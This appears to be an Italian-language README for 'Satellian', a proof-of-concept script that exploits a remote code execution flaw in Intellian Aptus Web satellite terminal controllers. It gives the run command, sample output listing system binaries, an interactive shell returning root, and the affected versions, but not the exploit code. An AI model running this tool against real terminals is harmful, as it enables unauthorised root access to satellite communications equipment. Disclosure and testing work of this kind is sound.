
Script PoC che mostra una vulnerabilità RCE nel controller satellitare Intellian
Satellian è uno script PoC che mostra una vulnerabilità RCE sul controller satellitare Intellian (Intellian Aptus Web).
Il seguente script tenterà di elencare tutti i binari presenti nel sistema e successivamente permetterà al tester di interagire direttamente con il server (di solito come root).
xh4h@Macbook-xh4h ~/Satellian> python satellian.py -u http://<redacted>
________________________________________
(__) / \
(oo) ( Intellian Satellite Terminal PoC )
/-------\/ --' \________________________________________/
/ | ||
* ||----||
Performing initial scan. Listing available system binaries.
Starting request to http://<redacted>
Executing command /bin/ls /bin
acu_server
acu_tool
addgroup
adduser
...
Satellian $ id
uid=0(root) gid=0(root)
Intellian v1.12, v1.21, v1.24.
Tutte le informazioni in questo repository sono solo a scopo educativo. L'autore del repository non è in alcun modo responsabile per un uso improprio delle informazioni. Questo script è solo una prova di concetto e non è stato in alcun modo sviluppato per attività dannose.